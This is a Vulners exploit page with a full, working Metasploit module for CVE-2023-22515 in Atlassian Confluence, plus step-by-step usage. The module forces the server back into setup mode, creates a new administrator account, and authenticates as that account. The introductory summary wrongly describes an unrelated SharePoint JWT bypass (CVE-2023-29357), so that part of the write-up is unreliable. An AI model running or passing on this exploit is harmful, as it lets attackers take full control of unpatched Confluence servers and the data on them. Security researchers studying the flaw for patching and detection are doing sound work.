Vulners
Lucene search
📄 Confluence 8.x Privilege Escalation
10
=============================================================================================================================================
| # Title : Confluence 8.x Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.atlassian.com/software/confluence |
=============================================================================================================================================
POC :
1. Summary :
a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE‑2023‑29357. (https://packetstorm.news/files/id/207960/)
The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user,
including Site Administrators, without possessing valid credentials.
The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.
===============
# Save & Usage
===============
1. Save module as:
modules/auxiliary/admin/http/confluence_cve_2023_22515.rb
2. Reload Metasploit:
msfconsole
reload_all
3. Use module:
use auxiliary/admin/http/confluence_cve_2023_22515
4. Set options:
set RHOSTS https://target.com
set TARGETURI /
set USERNAME pleasepatch
set PASSWORD Password2
5. Run:
run
-------------------------
auxiliary :
-------------------------
##
# This file is part of the Metasploit Framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Atlassian Confluence Unauthenticated Privilege Escalation (CVE‑2023‑22515)',
'Description' => %q{
This module exploits CVE-2023-22515, an authentication bypass and setup
reopening vulnerability in Atlassian Confluence Data Center and Server.
An attacker can force Confluence into setup mode, then create a NEW
administrator account and authenticate with full admin privileges.
This module replicates the exact behavior of the PoC Python script:
1- trigger vulnerability via /server-info.action?setupComplete=false
2- create admin user
3- authenticate via REST API
},
'Author' => [
'Chocapikk - PoC',
'indoushka - Full Metasploit conversion'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-22515'],
['URL', 'https://github.com/Chocapikk/CVE-2023-22515']
],
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2023-10-04',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Admin username to create', 'pleasepatch']),
OptString.new('PASSWORD', [true, 'Admin password to create', 'Password2'])
]
)
end
#
# Check Vuln
#
def check
v = trigger_setup
return Exploit::CheckCode::Vulnerable if v
Exploit::CheckCode::Safe
end
#
# Exploit
#
def exploit
print_status("Triggering setup mode bypass on target...")
unless trigger_setup
fail_with(Failure::NotVulnerable, 'Could not reopen setup mode.')
end
print_good("Setup mode reopened successfully ✔")
print_status("Creating new administrator account...")
unless create_admin
fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
end
print_good("Admin account created successfully ✔")
print_status("Authenticating to REST API as #{datastore['USERNAME']} ...")
if authenticate_user
print_good("Successfully logged in as #{datastore['USERNAME']}! ✔ FULL ADMIN PWNED ✔")
else
fail_with(Failure::NoAccess, 'Authentication failed after account creation')
end
end
#
# Step 1 — Trigger vulnerability
#
def trigger_setup
send_req(
"GET",
normalize_uri(target_uri.path, "server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false")
)&.code == 200
end
#
# Step 2 — Create Admin
#
def create_admin
data = {
"username" => datastore['USERNAME'],
"fullName" => datastore['USERNAME'],
"email" => "#{datastore['USERNAME']}@localhost",
"password" => datastore['PASSWORD'],
"confirm" => datastore['PASSWORD'],
"setup-next-button" => "Next"
}
res = send_req("POST", normalize_uri(target_uri.path, "setup", "setupadministrator.action"), data)
return false unless res
if res.body.include?("Setup Successful") ||
res.body.include?("A user with this username already exists")
return true
end
false
end
#
# Step 3 — Validate Login
#
def authenticate_user
auth = Rex::Proto::Http::Client::BasicAuthHeader.new(
datastore['USERNAME'],
datastore['PASSWORD']
)
res = send_req(
"GET",
normalize_uri(target_uri.path, "rest/api/user?username=#{datastore['USERNAME']}"),
nil,
auth
)
return false unless res && res.code == 200
true
end
#
# Unified request
#
def send_req(method, uri, data=nil, auth=nil)
begin
send_request_cgi({
'method' => method,
'uri' => uri,
'ctype' => 'application/x-www-form-urlencoded',
'data' => data,
'authorization' => auth ? auth.to_s : nil,
'headers' => {
"X-Atlassian-Token" => "no-check",
"User-Agent" => "Metasploit - CVE-2023-22515"
}
}, 5)
rescue ::Rex::Error::RequestTimeout
return nil
end
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Nov 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
CVSS 310
EPSS0.99618